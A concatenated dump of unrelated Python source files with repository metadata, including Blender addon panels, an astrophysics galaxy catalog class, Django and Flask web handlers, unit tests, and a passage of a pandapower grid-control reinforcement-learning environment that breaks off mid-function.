bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('context.gothic_assign_images', text = 'Assign Images', icon = 'FACESEL_HLT')
layout.prop(gothic_tools, "apply_to_selected_only")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_material_colors_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_material_colors_panel"
bl_label = "Material Colors"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = context.scene.gothic_tools
layout.operator('context.gothic_calc_colors', text = 'Calc Colors (slow)', icon = 'COLOR')
row = layout.row()
row.prop(gothic_tools, "set_transparency")
row.prop(gothic_tools, "pixel_samples")
layout.prop(gothic_tools, "saturation")
layout.prop(gothic_tools, "value")
layout.separator()
layout.separator()
class VIEW3D_PT_gothic_search_material_panel(Panel):
bl_idname = "VIEW3D_PT_gothic_search_material_panel"
bl_label = "Search Material"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Gothic Materials"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
gothic_tools = scene.gothic_tools
layout.operator('object.gothic_isolate_objects', text = 'Isolate Objects', icon = 'VIEWZOOM')
layout.prop(gothic_tools, "searched_material", text="with Mat")
layout.prop(gothic_tools, "isolate_all_layers")
layout.separator()
layout.separator()
# ------------------------------------------------------------------------
# register and unregister
# ------------------------------------------------------------------------
def register():
bpy.utils.register_module(__name__)
bpy.types.Scene.gothic_tools = PointerProperty(type=GothicMaterialSettings)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.gothic_tools
if __name__ == "__main__":
register()
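# Usage note: running this file from Blender's Text Editor (the 2.7x register_module API is
# assumed) calls register(), after which the panels appear in the 3D View tool shelf under
# the "Gothic Materials" category.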
9e4e27c4f397f2c0b09121050df5d040566af2dd | 7,881 | py | Python | v1/GCRCatalogs/MB2GalaxyCatalog.py | adam-broussard/descqa | d9681bd393553c31882ec7e28e6c1c7b6e482dd3 | ["BSD-3-Clause"] | 4 | 2017-11-14T03:33:57.000Z | 2021-06-05T16:35:40.000Z | 136 | 2017-11-06T16:02:58.000Z | 2021-11-11T18:20:23.000Z | 31 | 2017-11-06T19:55:35.000Z | 2020-12-15T13:53:53.000Z
# Massive Black 2 galaxy catalog class
import numpy as np
from astropy.table import Table
import astropy.units as u
import astropy.cosmology
from .GalaxyCatalogInterface import GalaxyCatalog
class MB2GalaxyCatalog(GalaxyCatalog):
"""
Massive Black 2 galaxy catalog class.
"""
def __init__(self, **kwargs):
fn = kwargs.get('fn')
self.type_ext = 'MB2'
self.filters = {
'zlo': True,
'zhi': True
}
self.h = 0.702
self.cosmology = astropy.cosmology.FlatLambdaCDM(H0=self.h*100.0, Om0 = 0.275)
self.quantities = {
'halo_id': self._get_stored_property,
'parent_halo_id': self._get_stored_property,
'redshift': self._get_stored_property,
'positionX': self._get_derived_property, # Position returned in Mpc, stored in kpc/h
'positionY': self._get_derived_property,
'positionZ': self._get_derived_property,
'velocityX': self._get_stored_property, # Velocity returned in km/sec
'velocityY': self._get_stored_property, # Velocity returned in km/sec
'velocityZ': self._get_stored_property, # Velocity returned in km/sec
'mass': self._get_derived_property, # Masses returned in Msun but stored in 1e10 Msun/h
'stellar_mass': self._get_derived_property,
'gas_mass': self._get_stored_property,
'sfr': self._get_stored_property,
'SDSS_u:observed:': self._get_derived_property,
'SDSS_g:observed:': self._get_derived_property,
'SDSS_r:observed:': self._get_derived_property,
'SDSS_i:observed:': self._get_derived_property,
'SDSS_z:observed:': self._get_derived_property,
'SDSS_u:rest:': self._get_derived_property,
'SDSS_g:rest:': self._get_derived_property,
'SDSS_r:rest:': self._get_derived_property,
'SDSS_i:rest:': self._get_derived_property,
'SDSS_z:rest:': self._get_derived_property,
}
self.derived = {
'mass': (('mass',), (1.e10 / self.h,), self._multiply),
'stellar_mass': (('stellar_mass',), (1.e10 / self.h,), self._multiply),
'positionX': (('x',), (1.e-3 / self.h,), self._multiply), # Position stored in kpc/h
'positionY': (('y',), (1.e-3 / self.h,), self._multiply),
'positionZ': (('z',), (1.e-3 / self.h,), self._multiply),
'SDSS_u:rest:': (('SDSS_u:rest:',), (), self._luminosity_to_magnitude),
'SDSS_g:rest:': (('SDSS_g:rest:',), (), self._luminosity_to_magnitude),
'SDSS_r:rest:': (('SDSS_r:rest:',), (), self._luminosity_to_magnitude),
'SDSS_i:rest:': (('SDSS_i:rest:',), (), self._luminosity_to_magnitude),
'SDSS_z:rest:': (('SDSS_z:rest:',), (), self._luminosity_to_magnitude),
'SDSS_u:observed:': (('SDSS_u:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_g:observed:': (('SDSS_g:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_r:observed:': (('SDSS_r:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_i:observed:': (('SDSS_i:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_z:observed:': (('SDSS_z:rest:', 'redshift'), (), self._add_distance_modulus),
}
self.Ngals = 0
self.sky_area = 4.*np.pi*u.sr # all sky by default
self.lightcone = False
self.box_size = 100.0 / self.h
self.SDSS_kcorrection_z = 0.1
return GalaxyCatalog.__init__(self, fn)
def load(self, fn):
"""
Given a catalog path, attempt to read the catalog and set up its
internal data structures.
"""
self.catalog = Table.read(fn, path='data')
self.Ngals = len(self.catalog)
self.redshift = self.catalog['redshift'][0]
return self
def _construct_mask(self, filters):
"""
Given a dictionary of filter constraints, construct a mask array
for use in filtering the catalog.
"""
        if not isinstance(filters, dict):
            raise TypeError("construct_mask: filters must be given as dict")
mask = np.ones(self.Ngals, dtype=bool)
mask &= (np.isfinite(self.catalog['x'])) # filter out NaN positions from catalog
mask &= (np.isfinite(self.catalog['y']))
mask &= (np.isfinite(self.catalog['z']))
for filter_name in filters.keys():
if filter_name == 'zlo':
mask &= (filters[filter_name] < self.catalog['redshift'])
elif filter_name == 'zhi':
mask &= (filters[filter_name] > self.catalog['redshift'])
return mask
def _get_stored_property(self, quantity, filters):
"""
Return the requested property of galaxies in the catalog as a NumPy
array. This is for properties that are explicitly stored in the
catalog.
"""
filter_mask = self._construct_mask(filters)
if not filter_mask.any():
return np.array([])
return self.catalog[quantity][np.where(filter_mask)].data
def _get_derived_property(self, quantity, filters):
"""
Return a derived halo property. These properties aren't stored
in the catalog but can be computed from properties that are via
a simple function call.
"""
filter_mask = self._construct_mask(filters)
if not filter_mask.any():
return np.array([])
arrays_required, scalars, func = self.derived[quantity]
return func([self.catalog[name][np.where(filter_mask)].data for name in arrays_required], scalars)
# Functions for computing derived values
def _translate(self, propList):
"""
Translation routine -- a passthrough that accomplishes mapping of
derived quantity names to stored quantity names via the derived
property function mechanism.
"""
return propList
def _multiply(self, array_tuple, scalar_tuple):
"""
Multiplication routine -- derived quantity is equal to a stored
quantity times some factor. Additional args for the derived quantity
routines are passed in as a tuple, so extract the factor first.
"""
return array_tuple[0] * scalar_tuple[0]
def _add_distance_modulus(self, array_tuple, scalar_tuple):
return self._luminosity_to_magnitude(array_tuple,scalar_tuple) + self.cosmology.distmod(array_tuple[1]).value
    def _luminosity_to_magnitude(self, array_tuple, scalar_tuple):
        # Luminosity appears to be stored in units of 1e28 erg/s/Hz; convert to the flux at
        # 10 pc (10 pc = 3.08567758e19 cm, hence the 1e38 * 3.08567758**2 in the divisor)
        # and apply the AB zero point: m = -2.5*log10(f) - 48.6
        bandlum = array_tuple[0]*1.0e28
        bandflux = bandlum/(4*(np.pi)*(1.0e38)*(3.08567758**2))
        return -2.5*(np.log10(bandflux)) - 48.6
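# Usage sketch (hypothetical catalog file; assumes the GalaxyCatalog base class invokes load()):
#   cat = MB2GalaxyCatalog(fn='mb2_galaxies.hdf5')
#   masses = cat.quantities['mass']('mass', {'zlo': 0.0, 'zhi': 1.0})  # Msun, via _get_derived_property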
9e4e87db0add45d330be3d156367bbd52e0ded32 | 714 | py | Python | skylernet/views.py | skylermishkin/skylernet | d715c69348c050d976ba7931127a576565b67ff1 | ["MIT"] | null | null | null
from django.shortcuts import get_object_or_404, render
from django.contrib.staticfiles.templatetags.staticfiles import static
def index(request):
return render(request, 'skylernet/landing.html')
def connect(request):
context = {'online_media': [{"name": 'LinkedIn',
'href': 'https://www.linkedin.com/in/skyler-mishkin-62446b158',
'src': static('skylernet/LinkedIn.svg')},
{'name': 'GitHub',
'href': 'https://github.com/skylermishkin',
'src': static('skylernet/GitHub.png')}]}
return render(request, 'skylernet/connect.html', context)
9e4f2abe49eca6572412ecb2672b250ab2b29afd | 1,217 | py | Python | specs/core.py | farleykr/acrylamid | c6c0f60b594d2920f6387ba82b552093d7c5fe1b | ["BSD-2-Clause-FreeBSD"] | 61 | 2015-01-15T23:23:11.000Z | 2022-03-24T16:39:31.000Z | 28 | 2015-01-26T22:32:24.000Z | 2022-01-13T01:11:56.000Z | 25 | 2015-01-22T19:26:29.000Z | 2021-06-30T21:53:06.000Z
# -*- coding: utf-8 -*-
import attest
from acrylamid.core import cache
class Cache(attest.TestBase):
def __context__(self):
with attest.tempdir() as path:
self.path = path
cache.init(self.path)
yield
@attest.test
def persistence(self):
cache.init(self.path)
cache.set('foo', 'bar', "Hello World!")
cache.set('foo', 'baz', "spam")
assert cache.get('foo', 'bar') == "Hello World!"
assert cache.get('foo', 'baz') == "spam"
cache.shutdown()
cache.init(self.path)
assert cache.get('foo', 'bar') == "Hello World!"
assert cache.get('foo', 'baz') == "spam"
@attest.test
def remove(self):
cache.init(self.path)
cache.set('foo', 'bar', 'baz')
cache.remove('foo')
cache.remove('invalid')
        assert cache.get('foo', 'bar') is None
        assert cache.get('invalid', 'bla') is None
@attest.test
def clear(self):
cache.init(self.path)
cache.set('foo', 'bar', 'baz')
cache.set('spam', 'bar', 'baz')
cache.clear()
        assert cache.get('foo', 'bar') is None
        assert cache.get('spam', 'bar') is None
9e554dd387e1b98981fc98073b0b6ac0775be949 | 812 | py | Python | swcf/controllers/index.py | pratiwilestari/simpleWebContactForm | 56369daadb8130bb72c19ae8ee10ad590804c84d | ["MIT"] | null | null | null
from flask.helpers import flash
from flask.wrappers import Request
from swcf import app
from flask import render_template, redirect, request, url_for
from swcf.dao.indexDAO import *
@app.route("/", methods=['GET'])
def index():
return render_template("layout.html")
@app.route("/sendPost", methods=['POST'])
def sendPost():
    print('masuk sini')  # debug trace: "got here"
name = request.form['name']
email = request.form['email']
issue = request.form['issue']
content = request.form['fillContent']
print(name, email, issue, content)
    hInsert = insertPost(name, email, issue, content)  # pass the variable, not the string literal 'content'
    print(hInsert)
    if hInsert['flag'] == 'T':
        flash("Proses insert berhasil", 'success')  # "Insert succeeded"
    else:
        flash("Tidak dapat melakukan proses insert", 'error')  # "Could not perform the insert"
return render_template("layout.html")
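# Usage sketch (hypothetical host/port; the form field names match the request.form reads above):
#   import requests
#   requests.post('http://localhost:5000/sendPost', data={'name': 'Ana', 'email': 'ana@example.com',
#                                                         'issue': 'Login', 'fillContent': 'Cannot sign in'})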
9e5734bc9428d420f659a156adfa25e7ae27b0df | 4,668 | py | Python | tests/broker/test_show_machine.py | ned21/aquilon | 6562ea0f224cda33b72a6f7664f48d65f96bd41a | ["Apache-2.0"] | 7 | 2015-07-31T05:57:30.000Z | 2021-09-07T15:18:56.000Z | 115 | 2015-03-03T13:11:46.000Z | 2021-09-20T12:42:24.000Z | 13 | 2015-03-03T11:17:59.000Z | 2021-09-09T09:16:41.000Z
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the show machine command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestShowMachine(TestBrokerCommand):
def testverifymachineall(self):
command = ["show", "machine", "--all"]
out = self.commandtest(command)
self.matchoutput(out, "ut3c5n10", command)
self.matchoutput(out, "ut3c1n3", command)
self.matchoutput(out, "ut3c1n4", command)
self.matchoutput(out, "ut3s01p1", command)
self.matchoutput(out, "ut8s02p1", command)
self.matchoutput(out, "ut9s03p1", command)
self.matchoutput(out, "ut10s04p1", command)
self.matchoutput(out, "ut11s01p1", command)
self.matchoutput(out, "f5test", command)
def testverifymachineallproto(self):
command = ["show", "machine", "--all", "--format", "proto"]
machines = self.protobuftest(command)
machine_names = set(msg.name for msg in machines)
for machine in ("ut3c5n10", "ut3c1n3", "ut3c1n4", "ut3s01p1",
"ut8s02p1", "ut9s03p1", "ut10s04p1", "ut11s01p1",
"f5test"):
self.assertIn(machine, machine_names)
def testverifyut3c1n3interfacescsv(self):
command = "show machine --machine ut3c1n3 --format csv"
out = self.commandtest(command.split(" "))
net = self.net["unknown0"]
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,eth0,%s,%s" %
(net.usable[2].mac, net.usable[2]), command)
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,eth1,%s,%s" %
(net.usable[3].mac, net.usable[3]), command)
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,bmc,%s,%s" %
(net.usable[4].mac, net.usable[4]), command)
def testrejectfqdn(self):
command = "show machine --machine unittest00.one-nyp.ms.com"
out = self.badrequesttest(command.split(" "))
self.matchoutput(out, "Illegal hardware label", command)
def testshowproto(self):
command = ["show_machine", "--machine", "ut3c1n3", "--format", "proto"]
machine = self.protobuftest(command, expect=1)[0]
self.assertEqual(machine.name, "ut3c1n3")
self.assertEqual(machine.host, "unittest00.one-nyp.ms.com")
self.assertEqual(machine.location.name, "ut3")
self.assertEqual(machine.model.name, "hs21-8853")
self.assertEqual(machine.model.vendor, "ibm")
self.assertEqual(machine.model.model_type, "blade")
self.assertEqual(machine.cpu, "e5-2660")
self.assertEqual(machine.cpu_count, 2)
self.assertEqual(machine.memory, 8192)
self.assertEqual(machine.serial_no, "KPDZ406")
self.assertEqual(len(machine.interfaces), 3)
self.assertEqual(len(machine.disks), 2)
self.assertEqual(machine.disks[0].device_name, "c0d0")
self.assertEqual(machine.disks[0].disk_type, "cciss")
self.assertEqual(machine.disks[0].capacity, 34)
self.assertEqual(machine.disks[0].address, "")
self.assertEqual(machine.disks[0].bus_address, "pci:0000:01:00.0")
self.assertEqual(machine.disks[0].wwn,
"600508b112233445566778899aabbccd")
self.assertEqual(machine.disks[1].device_name, "sda")
self.assertEqual(machine.disks[1].disk_type, "scsi")
self.assertEqual(machine.disks[1].capacity, 68)
self.assertEqual(machine.disks[1].address, "")
self.assertEqual(machine.disks[1].bus_address, "")
self.assertEqual(machine.disks[1].wwn, "")
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestShowMachine)
unittest.TextTestRunner(verbosity=2).run(suite)
9e5cfbb9bf026d80e086f27d5037c72987aa2b73 | 447 | py | Python | secret/forms.py | MinisterioPublicoRJ/apilabcontas | c01d5c0f1e6705eb8470ba7ba5078c0c172a9570 | ["MIT"] | 2 | 2019-06-10T18:34:15.000Z | 2020-04-29T14:23:34.000Z | secret/forms.py | MinisterioPublicoRJ/datalakecadg | c01d5c0f1e6705eb8470ba7ba5078c0c172a9570 | ["MIT"] | 5 | 2020-01-09T15:59:16.000Z | 2021-06-10T21:06:13.000Z | secret/forms.py | MinisterioPublicoRJ/datalakecadg | c01d5c0f1e6705eb8470ba7ba5078c0c172a9570 | ["MIT"] | null | null | null
from django import forms
from django.core.exceptions import ValidationError
from secret.models import Secret
class SecretForm(forms.ModelForm):
class Meta:
model = Secret
fields = ['username', 'email']
def clean_username(self):
username = self.cleaned_data['username']
if Secret.objects.filter(username=username).exists():
            raise ValidationError("Usuário já existe!")  # "User already exists!"
return username
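# Usage sketch (hypothetical field values, e.g. inside a view):
#   form = SecretForm(data={'username': 'ana', 'email': 'ana@example.com'})
#   if form.is_valid():   # runs clean_username(), rejecting duplicate usernames
#       form.save()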
9e5e1d23daee791eaea271ade55225f743349e3f | 1,067 | py | Python | tests/utils.py | 1116574/vulcan-api | 3cf64e78ba3e68299c94d629c3ffe4f7e8c94aed | ["MIT"] | null | null | null
from datetime import date
from os import environ
PARAMS_LESSON_PLAN = [
(
date(2018, 9, 4),
[
{"IdPrzedmiot": 173, "IdPracownik": 99},
{"IdPrzedmiot": 123, "IdPracownik": 101},
{"IdPrzedmiot": 172, "IdPracownik": 92},
{"IdPrzedmiot": 189, "IdPracownik": 91},
{"IdPrzedmiot": 119, "IdPracownik": 100},
{"IdPrzedmiot": 175, "IdPracownik": 97},
{"IdPrzedmiot": 118, "IdPracownik": 89},
],
)
]
PARAMS_TESTS = [
(date(2018, 10, 5), [{"Id": 661, "IdPrzedmiot": 177, "IdPracownik": 87}]),
(
date(2018, 10, 23),
[
{"Id": 798, "IdPrzedmiot": 173, "IdPracownik": 99},
{"Id": 838, "IdPrzedmiot": 172, "IdPracownik": 92},
],
),
]
PARAMS_HOMEWORKS = [
(
date(2018, 10, 23),
[
{"Id": 305, "IdPracownik": 100, "IdPrzedmiot": 119},
{"Id": 306, "IdPracownik": 100, "IdPrzedmiot": 119},
],
)
]
def load_variable(name):
return environ.get(name)
9e5eaad811b723cd9fbdf58606b08cc92c36666b | 886 | py | Python | setup.py | utahta/pyvbcode | 5708f5563016578576a48cf7374470c4e5c11825 | ["MIT"] | 3 | 2018-10-14T12:38:49.000Z | 2021-06-05T08:13:42.000Z | 1 | 2017-07-02T15:27:45.000Z | 2017-10-28T20:52:54.000Z | 5 | 2016-12-26T08:06:24.000Z | 2020-02-22T17:20:16.000Z
# vim:fileencoding=utf8
from distutils.core import setup
import os
README = os.path.join(os.path.dirname(__file__),'PKG-INFO')
long_description = open(README).read() + "\n"
setup(name="vbcode",
version='0.2.0',
py_modules=['vbcode'],
description="Variable byte codes",
author="utahta",
author_email = "labs.ninxit@gmail.com",
long_description=long_description,
classifiers=["Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Python Software Foundation License",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
"Natural Language :: Japanese"
],
url="https://github.com/utahta/pyvbcode",
license="MIT"
)
9e5f5a16f32d2c7ad12cdebabca7ff18c984b6b6 | 1,221 | py | Python | cogs/testing_cog.py | Critteros/DzwoneczekBOT | 4f6100cf26f430521247f494620c9a2ceda1f362 | ["Apache-2.0"] | null | null | null
"""
Extension designed to test bot functionality, just for testing
"""
# Library includes
from discord.ext import commands
# App includes
from app.client import BotClient
class TestCog(commands.Cog):
"""
Class cog for the testing_cog cog extension
"""
def __init__(self, client: BotClient):
self.client: BotClient = client
self.log = client.log
@commands.command(help='test', brief='Testing command')
async def echo(self, ctx: commands.Context, *args):
"""
        Testing function designed to print context to the logging output
Args:
ctx (commands.Context): Context of invocation
"""
log = self.log
log.debug('Executing echo command')
log.debug(f'Context is: {ctx.__dict__}')
log.debug(f'Context type is {type(ctx)}')
log.debug(f'Context message: {ctx.args}')
log.debug(f'data is: /{args}/\n data type is{type(args)}')
await ctx.message.reply("Hi <:python:815369954224373760>")
def setup(client):
"""
Setup function for testing_cog extension
Args:
client (app.client.BotClient): Client that connects to discord API
"""
client.add_cog(TestCog(client))
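# Usage sketch (hypothetical bot wiring; the command prefix depends on the BotClient config):
#   client.load_extension('cogs.testing_cog')   # discord.py calls setup() above
#   # then, in a channel the bot can read:  !echo hello world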
9e5ff0af4ee8d2c0f56518f7dfc6f17b87b1d4b4 | 44,126 | py | Python | setup.py | amahoro12/anne | 9b68c71c491bde4f57c2cbbf78a377239a9026d8 | ["MIT"] | null | null | null
## This script sets up classes for the 4-bus and 2-bus environments
import pandapower as pp
import pandapower.networks as nw
import pandapower.plotting as plot
import enlopy as el
import numpy as np
import pandas as pd
import pickle
import copy
import math
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import pandapower.control as ct
import statistics as stat
from FACTScontrol import SeriesFACTS, ShuntFACTS
pd.options.display.float_format = '{:.4g}'.format
### This 4-bus class is not complete as of handover to ABB PG and Magnus Tarle.
# The 2-bus class further below is however complete.
class powerGrid_ieee4:
def __init__(self, numberOfTimeStepsPerState=4):
print('in init. Here we lay down the grid structure and load some random state values based on IEEE dataset');
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
self.loadProfile = pickle.load(pickle_file)
with open('Data/generatorValuesEvery5mins.pkl', 'rb') as pickle_file:
self.powerProfile = pickle.load(pickle_file)
with open('Data/trainIndices.pkl', 'rb') as pickle_file:
self.trainIndices = pickle.load(pickle_file)
with open('Data/testIndices.pkl', 'rb') as pickle_file:
self.testIndices = pickle.load(pickle_file)
self.k_old=0;
self.q_old=0;
self.actionSpace = {'v_ref_pu': [i*5 / 100 for i in range(16, 25)], 'lp_ref': [i * 5 for i in range(0, 31)]}
## Basic ieee 4bus system
self.net = pp.networks.case4gs();
####Shunt FACTS device (bus 1)
# MV bus
bus_SVC = pp.create_bus(self.net, name='MV SVCtrafo bus', vn_kv=69, type='n', geodata=(-2, 2.5), zone=2,
max_vm_pu=1.1,
min_vm_pu=0.9)
# Trafo
trafoSVC = pp.create_transformer_from_parameters(self.net, hv_bus=1, lv_bus=4, in_service=True,
name='trafoSVC', sn_mva=110, vn_hv_kv=230, vn_lv_kv=69,
vk_percent=12, vkr_percent=0.26, pfe_kw=55, i0_percent=0.06,
shift_degree=0, tap_side='hv', tap_neutral=0, tap_min=-9,
tap_max=9,
tap_step_percent=1.5, tap_step_degree=0,
tap_phase_shifter=False)
        # Tap changer is usually not used on this trafo in real-life implementations
#trafo_control = ct.DiscreteTapControl(net=self.net, tid=0, vm_lower_pu=0.95, vm_upper_pu=1.05)
# Breaker between grid HV bus and trafo HV bus to connect buses
sw_SVC = pp.create_switch(self.net, bus=1, element=0, et='t', type='CB', closed=False)
# Shunt device connected with MV bus
shuntDev = pp.create_shunt(self.net, bus_SVC, 0, in_service=True, name='Shunt Device', step=1)
##Series device (at line 3, in middle between bus 2 and 3)
# Add intermediate buses for bypass and series compensation impedance
bus_SC1 = pp.create_bus(self.net, name='SC bus 1', vn_kv=230, type='n', geodata=(-1, 3.1), zone=2,
max_vm_pu=1.1, min_vm_pu=0.9)
bus_SC2 = pp.create_bus(self.net, name='SC bus 2', vn_kv=230, type='n', geodata=(-1, 3.0), zone=2,
max_vm_pu=1.1, min_vm_pu=0.9)
sw_SC_bypass = pp.create_switch(self.net, bus=5, element=6, et='b', type='CB', closed=True)
imp_SC = pp.create_impedance(self.net, from_bus=5, to_bus=6, rft_pu=0.01272, xft_pu=-0.0636,
rtf_pu=0.01272, xtf_pu=-0.0636, sn_mva=250, in_service=True)
        # Adjust original Line 3 to connect to the new buses instead.
self.net.line.at[3, ['length_km', 'to_bus', 'name']] = [0.5, 5, 'line1_SC']
lineSC2 = pp.create_line_from_parameters(self.net, name='line2_SC',
c_nf_per_km=self.net.line.at[3, 'c_nf_per_km'],
df=self.net.line.at[3, 'df'], from_bus=6,
g_us_per_km=self.net.line.at[3, 'g_us_per_km'],
in_service=self.net.line.at[3, 'in_service'], length_km=0.5,
max_i_ka=self.net.line.at[3, 'max_i_ka'],
max_loading_percent=self.net.line.at[3, 'max_loading_percent'],
parallel=self.net.line.at[3, 'parallel'],
r_ohm_per_km=self.net.line.at[3, 'r_ohm_per_km'],
std_type=self.net.line.at[3, 'std_type'], to_bus=3,
type=self.net.line.at[3, 'type'],
x_ohm_per_km=self.net.line.at[3, 'x_ohm_per_km']);
# Change PV generator to static generator
self.net.gen.drop(index=[0], inplace=True) # Drop PV generator
pp.create_sgen(self.net, 3, p_mw=318, q_mvar=181.4, name='static generator', scaling=1)
# Randomize starting index in load/gen profiles
self.numberOfTimeStepsPerState=numberOfTimeStepsPerState;
self.stateIndex = np.random.randint(len(self.loadProfile)-self.numberOfTimeStepsPerState, size=1)[0];
#self.stateIndex=0
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False)
print('Environment has been successfully initialized');
except:
print('Some error occured while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
# Power flow calculation, runControl = True gives shunt device trafo tap changer iterative control activated
def runEnv(self, runControl):
try:
pp.runpp(self.net, run_control=runControl);
#print('Environment has been successfully initialized');
except:
print('Some error occurred while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
    ## Retrieve voltage and line loading percent as measurements of the current state
def getCurrentState(self):
bus_index_shunt = 1
line_index = 1;
return (self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]);
## Retrieve measurements for multiple buses, including load angle for DQN as well
def getCurrentStateForDQN(self):
return [self.net.res_bus.vm_pu[1:-3], self.net.res_line.loading_percent[0:], self.net.res_bus.va_degree[1:-3]];
    ## UPDATE NEEDED:
def takeAction(self, lp_ref, v_ref_pu):
#q_old = 0
bus_index_shunt = 1
line_index=3;
impedenceBackup = self.net.impedance.loc[0, 'xtf_pu'];
shuntBackup = self.net.shunt.q_mvar
self.net.switch.at[1, 'closed'] = False
self.net.switch.at[0, 'closed'] = True
        ##shunt compensation
q_comp = self.Shunt_q_comp(v_ref_pu, bus_index_shunt, self.q_old);
self.q_old = q_comp;
self.net.shunt.q_mvar = q_comp;
##series compensation
k_x_comp_pu = self.K_x_comp_pu(lp_ref, 1, self.k_old);
self.k_old = k_x_comp_pu;
x_line_pu = self.X_pu(line_index)
self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']] = x_line_pu * k_x_comp_pu
networkFailure = False
self.stateIndex += 1;
if self.stateIndex < len(self.powerProfile):
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=True);
reward = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
except:
print('Unstable environment settings');
networkFailure = True;
reward = -1000;
return (self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]), reward, self.stateIndex == len(self.powerProfile) or networkFailure;
##Function to calculate line reactance in pu
def X_pu(self, line_index):
s_base = 100e6
v_base = 230e3
x_base = pow(v_base, 2) / s_base
x_line_ohm = self.net.line.x_ohm_per_km[line_index]
        x_line_pu = x_line_ohm / x_base # Can take one since this line is divided into
        # 2 identical lines with length 0.5 km
return x_line_pu
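    # Worked example for X_pu with the constants above: x_base = (230e3)**2 / 100e6 = 529 ohm,
    # so a (hypothetical) line with x_ohm_per_km = 52.9 comes out at x_line_pu = 0.1.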
def reset(self):
print('reset the current environment for next episode');
oldIndex = self.stateIndex;
self.stateIndex = np.random.randint(len(self.loadProfile)-1, size=1)[0];
self.net.switch.at[0, 'closed'] = False
self.net.switch.at[1, 'closed'] = True
self.k_old = 0;
self.q_old = 0;
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
print('Environment has been successfully initialized');
except:
print('Some error occurred while resetting the environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
# Calculate immediate reward with loadangle as optional
def calculateReward(self, voltages, loadingPercent, loadAngles=10):
try:
rew = 0;
            for i in range(1, len(voltages)-2): # Don't need to include bus 0 as it is the slack with constant voltage and angle;
                # -2 because we don't want to include the buses created for the FACTS device implementation (3 of them)
if voltages[i] > 1.25 or voltages[i] < 0.8:
rew -= 50;
elif voltages[i] > 1.1 or voltages[i] < 0.9:
rew -= 25;
elif voltages[i] > 1.05 or voltages[i] < 0.95:
rew -= 10;
elif voltages[i] > 1.025 or voltages[i] < 0.975:
rew += 10;
else:
rew += 20;
loadingPercentInstability = np.std(loadingPercent) * len(loadingPercent);
rew -= loadingPercentInstability
            # Check load angle(s); loadAngles may be an array of bus angles or a single angle
            if hasattr(loadAngles, '__len__'):
                for i in range(1, len(loadAngles)-2):
                    if abs(loadAngles[i]) >= 30:
                        rew -= 200
            elif abs(loadAngles) >= 30:
                rew -= 200
except:
print('exception in calculate reward')
print(voltages);
print(loadingPercent)
return 0;
return rew
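    # Worked reward example (illustrative numbers): a monitored bus at 1.03 pu earns +10; two
    # lines loaded at 60 % and 80 % add a penalty of np.std([60, 80]) * 2 = 20, so the net
    # contribution is -10 (load angles below 30 degrees add nothing).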
## Simple plot of one-line diagram
def plotGridFlow(self):
print('plotting powerflow for the current state')
plot.simple_plot(self.net)
## Scale load and generation from load and generation profiles
## Update Needed (Nominal Values)
def scaleLoadAndPowerValue(self,index):
scalingFactorLoad = self.loadProfile[index] / (sum(self.loadProfile)/len(self.loadProfile));
scalingFactorPower = self.powerProfile[index] / max(self.powerProfile);
# Scaling all loads and the static generator
self.net.load.p_mw = self.net.load.p_mw * scalingFactorLoad;
self.net.load.q_mvar = self.net.load.q_mvar * scalingFactorLoad;
self.net.sgen.p_mw = self.net.sgen.p_mw * scalingFactorPower;
self.net.sgen.q_mvar = self.net.sgen.q_mvar * scalingFactorPower;
## UPDATE NEEDED:
##Function for transition from reference power to reactance of series device
def K_x_comp_pu(self, loading_perc_ref, line_index, k_old):
##NEW VERSION TEST:
c = 15 # Coefficient for transition
k_x_comp_max_ind = 0.4
k_x_comp_max_cap = -k_x_comp_max_ind
loading_perc_meas = self.net.res_line.loading_percent[line_index]
k_delta = (c * k_x_comp_max_ind * (
